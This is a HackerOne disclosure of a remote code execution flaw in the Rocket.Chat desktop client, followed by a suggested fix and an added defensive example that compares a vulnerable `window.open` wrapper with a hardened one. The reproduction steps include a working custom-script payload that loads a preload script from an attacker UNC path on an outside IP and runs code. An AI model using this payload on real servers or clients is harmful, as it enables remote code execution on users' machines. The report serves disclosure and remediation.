Rocket.Chat: Remote Code Execution in Rocket.Chat-Desktop

2020-07-27T12:00:29
ID H1:943725
Type hackerone
Reporter sectex
Modified 2020-11-07T14:40:26

Description

Description: Rocket.Chat-Desktop is vulnerable to remote code execution. The desktop client's `window.open` wrapper forwards the caller-controlled features string to Electron, so an attacker who controls a server the client connects to (or can inject a custom script into one) is able to create new BrowserWindow instances with `nodeIntegration` enabled and a malicious preload script of their choosing.

Releases Affected:

  • Rocket.Chat-Desktop-Client: < v3.0.0-develop

Steps To Reproduce (by setting up a malicious server):

  1. Go to Administration » Layout » Custom Scripts » Custom Script for Logged In Users
  2. Insert the following script: window.open('data:text/html,<h1>PWNED</h1>', '', ['nodeIntegration=true', 'preload=\\\\45.155.173.235\\data\\cmd.js'].join(','))
  3. Click Save changes
  4. Open Rocket.Chat-Desktop and connect to the server
  5. cmd.exe pops up: the preload script is fetched from the attacker's UNC path and runs with Node integration in the new window.

Suggested mitigation

  • src » preload » jitsi.js

```js
const wrapWindowOpen = (defaultWindowOpen) => (href, frameName, features) => {
  const settings = getSettings();

  features = ''; // <- should fix it: never forward the caller's features string

  if (settings && url.parse(href).host === settings.get('Jitsi_Domain')) {
    features = [
      features,
      'nodeIntegration=true',
      `preload=${ `${ remote.app.getAppPath() }/app/preload.js` }`,
    ].join(',');
  }

  return defaultWindowOpen.call(window, href, frameName, features);
};
```

  The root cause is that `features` comes from page-controlled JavaScript (here, the server's custom script) and is passed straight through to Electron's native `window.open`, where it can set BrowserWindow web preferences such as `nodeIntegration` and `preload`. Clearing `features` before the Jitsi check removes that path entirely; the only privileged features the wrapper ever emits are then the app's own, for the configured Jitsi domain. Note that this also discards benign window features (size, position) that a page might legitimately request.
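
The following is an added example, not code from the report or from Rocket.Chat-Desktop. It models the wrapper shape quoted above with a stub in place of Electron's native `window.open`, so it runs under plain Node: it shows that the report's features string carries privilege-changing keys, that the vulnerable wrapper shape forwards them verbatim for a non-Jitsi `href`, and that a hardened wrapper forwards nothing from the caller. The Jitsi domain `meet.jit.si`, the app path `/opt/rocketchat`, the simplified features parser and the list of dangerous keys are all assumptions made for the example.

```javascript
// Added example (not Rocket.Chat-Desktop's own code). Electron's native
// window.open is replaced by a stub that records the features it receives.

// BrowserWindow/webPreferences keys an untrusted features string must never
// be allowed to set (constructed list for this example, not exhaustive).
const DANGEROUS_FEATURE_KEYS = new Set([
  'nodeintegration', 'nodeintegrationinworker', 'nodeintegrationinsubframes',
  'preload', 'contextisolation', 'sandbox', 'webviewtag', 'websecurity',
  'enableremotemodule', 'allowrunninginsecurecontent',
]);

// Parse "key=value,key2=value2,flag" into a Map with lower-cased keys.
// Simplified stand-in for Electron's own parsing (assumption).
function parseFeatures(features) {
  const parsed = new Map();
  for (const part of String(features == null ? '' : features).split(',')) {
    const item = part.trim();
    if (!item) continue;
    const eq = item.indexOf('=');
    const key = (eq === -1 ? item : item.slice(0, eq)).trim().toLowerCase();
    const value = eq === -1 ? 'true' : item.slice(eq + 1).trim();
    parsed.set(key, value);
  }
  return parsed;
}

// Keys in a features string that would change the new window's privileges.
function findDangerousFeatures(features) {
  return [...parseFeatures(features).keys()].filter((k) => DANGEROUS_FEATURE_KEYS.has(k));
}

// Host of href, or '' when href has no host or is not a valid URL
// (data: URLs have no host); mirrors the url.parse(href).host check.
function hostOf(href) {
  try {
    return new URL(href).host;
  } catch (e) {
    return '';
  }
}

// Stub for Electron's native window.open: records every call.
function makeRecordingWindowOpen() {
  const calls = [];
  const open = (href, frameName, features) => {
    calls.push({ href, frameName, features });
    return null;
  };
  return { open, calls };
}

// Shape of the vulnerable wrapper: caller features are forwarded verbatim
// (and, for the Jitsi host, merged with the app's own privileged ones).
function makeVulnerableWrapper(defaultWindowOpen, settings, appPath) {
  return (href, frameName, features) => {
    if (settings && hostOf(href) === settings.get('Jitsi_Domain')) {
      features = [features, 'nodeIntegration=true', `preload=${appPath}/app/preload.js`].join(',');
    }
    return defaultWindowOpen(href, frameName, features);
  };
}

// Hardened wrapper: caller features are discarded entirely; the only
// privileged features ever emitted are the app's own, for the Jitsi host.
function makeHardenedWrapper(defaultWindowOpen, settings, appPath) {
  return (href, frameName, _ignoredFeatures) => {
    let features = '';
    const host = hostOf(href);
    if (settings && host && host === settings.get('Jitsi_Domain')) {
      features = ['nodeIntegration=true', `preload=${appPath}/app/preload.js`].join(',');
    }
    return defaultWindowOpen(href, frameName, features);
  };
}

// Drive one wrapper with a payload and return what the native window.open
// would have received. Domain and app path are constructed for the example.
function forwardedFeatures(makeWrapper, href, attackerFeatures) {
  const settings = new Map([['Jitsi_Domain', 'meet.jit.si']]);
  const recorder = makeRecordingWindowOpen();
  const open = makeWrapper(recorder.open, settings, '/opt/rocketchat');
  open(href, '', attackerFeatures);
  return recorder.calls[0].features;
}

// The features string and href from the report's custom script.
const REPORT_FEATURES = ['nodeIntegration=true', 'preload=\\\\45.155.173.235\\data\\cmd.js'].join(',');
const REPORT_HREF = 'data:text/html,<h1>PWNED</h1>';

console.log('dangerous keys:', findDangerousFeatures(REPORT_FEATURES));
console.log('vulnerable wrapper forwards:', forwardedFeatures(makeVulnerableWrapper, REPORT_HREF, REPORT_FEATURES));
console.log('hardened wrapper forwards:', JSON.stringify(forwardedFeatures(makeHardenedWrapper, REPORT_HREF, REPORT_FEATURES)));
```

`findDangerousFeatures` is the check to run in a code review or a runtime guard on any `window.open` wrapper: if a caller-supplied string can ever contain one of those keys, the wrapper is handing out privileges. The hardened wrapper does not try to filter the string; it ignores it, which is the same decision the suggested `features = ''` makes.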

Impact

Remote Code Execution in Rocket.Chat-Desktop